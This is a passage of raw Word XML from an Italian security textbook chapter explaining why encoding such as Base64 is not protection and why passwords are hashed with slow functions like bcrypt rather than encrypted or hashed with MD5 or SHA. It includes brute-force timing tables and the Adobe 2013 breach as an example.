        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'password-segretissima-2025'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decodificato in 200 microsecondi. Nessun</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">segreto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è stato superato: Base64 è una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rappresentazione alternativa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non una protezione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo stesso vale, per la stessa ragione, per:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per gli spazi, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTML entity encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">48656c6c6f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Hello</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ROT13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e altri cifrari a sostituzione manuale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutti questi sono encoding o cifrari triviali, mai protezione. Se trovi credenziali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">protette</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Base64 in un file di configurazione, non sono protette: sono in chiaro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="309"/>
    <w:bookmarkStart w:id="313" w:name="Xc578b05420f4f0c913e7684a0b395f6392b38bd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="528" w:name="sec_7_3"/>
      <w:r>
        <w:t xml:space="preserve">7.3 Perché le password si hashano, non si cifrano</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso il punto chiave del capitolo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le password non si memorizzano mai in chiaro, e non si cifrano: si hashano.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="310" w:name="perché-non-in-chiaro"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché non in chiaro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ovvio: se rubano il database, hanno tutte le password. Insieme alla pessima abitudine umana di riusare la stessa password ovunque, le password rubate da un sito vengono provate su tutti gli altri (Gmail, banca, social media). Si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">credential stuffing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ed è oggi il principale vettore di account takeover nel mondo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="310"/>
    <w:bookmarkStart w:id="311" w:name="perché-non-cifrate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché non cifrate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembra controintuitivo: se cifro le password con AES, l’attaccante che ruba il database ha solo dati cifrati. Bene, no?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">No, perché:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiave di decifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deve stare da qualche parte. Se sta sul server, l’attaccante che è entrato nel server ce l’ha. Se sta in un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esterno, l’applicazione deve poterla recuperare per fare il login — quindi può recuperarla anche un attaccante che ha compromesso l’applicazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se la cifratura è reversibile,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">anche tu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(operatore del sistema) puoi vedere le password dei tuoi utenti. Questo è eticamente discutibile e legalmente rischioso (GDPR Art. 32). Le password degli utenti dovrebbero essere segrete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">anche per chi gestisce il servizio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Caso reale:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Adobe 2013</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 153 milioni di account esposti. Adobe aveva scelto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le password con 3DES, invece di hasharle. Quando il database è stato rubato, l’attaccante ha decifrato le password con relativa facilità (chiavi mal protette + algoritmo antiquato). Tutti gli account compromessi hanno dovuto cambiare password ovunque.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="311"/>
    <w:bookmarkStart w:id="312" w:name="come-funziona-davvero-il-login-con-hash"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come funziona davvero il login con hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo schema corretto è:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Registrazione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. L’utente inserisce la password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MioSegreto123!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Il server calcola l’hash:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt("MioSegreto123!") = "$2b$12$xyz...abc..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Il server salva l’hash nel database.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La password originale non è memorizzata da nessuna parte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. L’utente inserisce di nuovo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MioSegreto123!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Il server recupera l’hash dal database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Il server calcola l’hash della password inserita e confronta con quello salvato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Se corrispondono, login OK; altrimenti, no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notare: il server, anche dopo molti login, non ha mai visto la password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in chiaro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">memorizzata. L’ha vista nella richiesta HTTP (e poi gettata via dalla memoria), ma non l’ha mai salvata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Conseguenza pratica.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Ho dimenticato la password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non può</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">restituirti la password vecchia: se il sito è fatto bene, la password vecchia non esiste più da nessuna parte. Il sito può solo permetterti di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">impostarne una nuova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se un sito ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rispedisce la password vecchia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">via email, scappa: significa che la teneva in chiaro o cifrata in modo recuperabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="312"/>
    <w:bookmarkEnd w:id="313"/>
    <w:bookmarkStart w:id="317" w:name="Xd57031c7d141ba11e0ba7c142a7c8e0807ed8d8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="529" w:name="sec_7_4"/>
      <w:r>
        <w:t xml:space="preserve">7.4 Perché MD5 e SHA-1 sono morti per le password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ora la domanda chiave:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funzione di hash usare? La risposta breve:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non MD5, non SHA-1, non SHA-256, non SHA-512</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tutte rotte (le prime due) o inadeguate (le seconde) per le password.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="314" w:name="il-problema-della-velocità"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il problema della velocità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">buona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funzione di hash crittografico è progettata per essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">veloce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. SHA-256 viene usata per verificare l’integrità di file di gigabyte: deve calcolare in millisecondi, altrimenti è inusabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Per le password questo è un problema, non un vantaggio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un attaccante che ha rubato il database delle password vuole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indovinarle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provando miliardi di candidati. Più la funzione è veloce, più tentativi può fare al secondo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Numeri reali, su una singola GPU NVIDIA RTX 4090 (commerciale, ~1.500 €) nel 2024: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Algoritmo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hash al secondo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~164 miliardi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~50 miliardi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~10 miliardi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt cost 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~3.000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tradotto in tempi di forza bruta su una password di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8 caratteri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lettere maiuscole+minuscole+numeri = 62 caratteri possibili, 218.340.105.584.896 combinazioni):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Algoritmo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tempo per esaurire tutte le 8-char</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">22 minuti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 ora 13 minuti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6 ore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt cost 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">2.300 anni</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La differenza è abissale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt è circa 50 milioni di volte più lento di MD5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— esattamente il suo punto di forza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="314"/>
    <w:bookmarkStart w:id="315" w:name="le-rainbow-table"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le rainbow table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggravante dei vecchi algoritmi: per password comuni, l’attaccante non deve nemmeno calcolare. Esistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rainbow table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
